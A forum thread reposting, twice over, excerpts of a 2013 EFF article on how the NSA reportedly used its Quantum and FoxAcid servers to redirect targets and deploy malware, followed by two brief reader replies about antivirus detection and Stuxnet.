Welcome to DU!
The truly grassroots left-of-center political community where regular people, not algorithms, drive the discussions and set the standards.
Join the community:
Create a free account
Support DU (and get rid of ads!):
Become a Star Member
Latest Breaking News
General Discussion
The DU Lounge
All Forums
Issue Forums
Culture Forums
Alliance Forums
Region Forums
Support Forums
Help & Search
General Discussion
Related: Editorials & Other Articles, Issue Forums, Alliance Forums, Region ForumsHow The NSA Deploys Malware: An In-Depth Look at the New Revelations
https://www.eff.org/deeplinks/2013/10/how-nsa-deploys-malware-new-revelationsHow The NSA Deploys Malware: An In-Depth Look at the New Revelations
October 8, 2013 | By Dan Auerbach
We've long suspected that the NSA, the world's premiere spy agency, was pretty good at breaking into computers. But now, thanks to an article by security expert Bruce Schneierwho is working with the Guardian to go through the Snowden documentswe have a much more detailed view of how the NSA uses exploits in order to infect the computers of targeted users. The template for attacking people with malware used by the NSA is in widespread use by criminals and fraudsters, as well as foreign intelligence agencies, so it's important to understand and defend against this threat to avoid being a victim to the plethora of attackers out there.
Deploying malware over the web generally involves two steps. First, as an attacker, you have to get your victim to visit a website under your control. Second, you have to get softwareknown as malwareinstalled on the victim's computer in order to gain control of that machine. This formula isn't universal, but is often how web-based malware attacks proceed.
In order to accomplish the first step of getting a user to visit a site under your control, an attacker might email the victim text that contains a link to the website in question, in a so-called phishing attack. The NSA reportedly uses phishing attacks sometimes, but we've learned that this step usually proceeds via a so-called man-in-the-middle attack.1 The NSA controls a set of servers codenamed Quantum that sit on the Internet backbone, and these servers are used to redirect targets away from their intended destinations to still other NSA-controlled servers that are responsible for the injection of malware. So, for example, if a targeted user visits yahoo.com, the target's browser will display the ordinary Yahoo! landing page but will actually be communicating with a server controlled by the NSA. This malicious version of Yahoo!'s website will tell the victim's browser to make a request in a background to another server controlled by the NSA which is used to deploy malware...
...The NSA has a set of servers on the public Internet with the code name FoxAcid used to deploy malware. Once their Quantum servers redirect targets to a specially crafted URL hosted on a FoxAcid server, software on that FoxAcid server selects from a toolkit of exploits in order to gain access to the user's computer. Presumably this toolkit has both known public exploits that rely on a user's software being out of date, as well as zero-day exploits which are generally saved for high value targets.2 The agency then reportedly uses this initial malware to install longer lasting malware.
October 8, 2013 | By Dan Auerbach
We've long suspected that the NSA, the world's premiere spy agency, was pretty good at breaking into computers. But now, thanks to an article by security expert Bruce Schneierwho is working with the Guardian to go through the Snowden documentswe have a much more detailed view of how the NSA uses exploits in order to infect the computers of targeted users. The template for attacking people with malware used by the NSA is in widespread use by criminals and fraudsters, as well as foreign intelligence agencies, so it's important to understand and defend against this threat to avoid being a victim to the plethora of attackers out there.
Deploying malware over the web generally involves two steps. First, as an attacker, you have to get your victim to visit a website under your control. Second, you have to get softwareknown as malwareinstalled on the victim's computer in order to gain control of that machine. This formula isn't universal, but is often how web-based malware attacks proceed.
In order to accomplish the first step of getting a user to visit a site under your control, an attacker might email the victim text that contains a link to the website in question, in a so-called phishing attack. The NSA reportedly uses phishing attacks sometimes, but we've learned that this step usually proceeds via a so-called man-in-the-middle attack.1 The NSA controls a set of servers codenamed Quantum that sit on the Internet backbone, and these servers are used to redirect targets away from their intended destinations to still other NSA-controlled servers that are responsible for the injection of malware. So, for example, if a targeted user visits yahoo.com, the target's browser will display the ordinary Yahoo! landing page but will actually be communicating with a server controlled by the NSA. This malicious version of Yahoo!'s website will tell the victim's browser to make a request in a background to another server controlled by the NSA which is used to deploy malware...
...The NSA has a set of servers on the public Internet with the code name FoxAcid used to deploy malware. Once their Quantum servers redirect targets to a specially crafted URL hosted on a FoxAcid server, software on that FoxAcid server selects from a toolkit of exploits in order to gain access to the user's computer. Presumably this toolkit has both known public exploits that rely on a user's software being out of date, as well as zero-day exploits which are generally saved for high value targets.2 The agency then reportedly uses this initial malware to install longer lasting malware.
Also discussed here:
http://www.theguardian.com/world/2013/oct/04/tor-attacks-nsa-users-online-anonymity
http://sync.democraticunderground.com/1014611160
InfoView thread info, including edit history
TrashPut this thread in your Trash Can (My DU » Trash Can)
BookmarkAdd this thread to your Bookmarks (My DU » Bookmarks)
2 replies, 1274 views
ShareGet links to this post and/or share on social media
AlertAlert this post for a rule violation
PowersThere are no powers you can use on this post
EditCannot edit other people's posts
ReplyReply to this post
EditCannot edit other people's posts
Rec (8)
ReplyReply to this post
2 replies
= new reply since forum marked as read
Highlight:
NoneDon't highlight anything
5 newestHighlight 5 most recent replies
How The NSA Deploys Malware: An In-Depth Look at the New Revelations (Original Post)
friendly_iconoclast
Oct 2013
OP
dkf
(37,305 posts)1. Do any virus protectors or security programs wipe them out or detect them even?
Are the virus programs complicit in leaving this stuff on our computers?
woolldog
(8,791 posts)2. Didn't Kaspersky discover the stuxnet virus?
I believe Iran called them in as consultants.
But I doubt any of the over the counter anti virus programs can detect NSA level viruses. And when/if they do I suspect the damage has been done.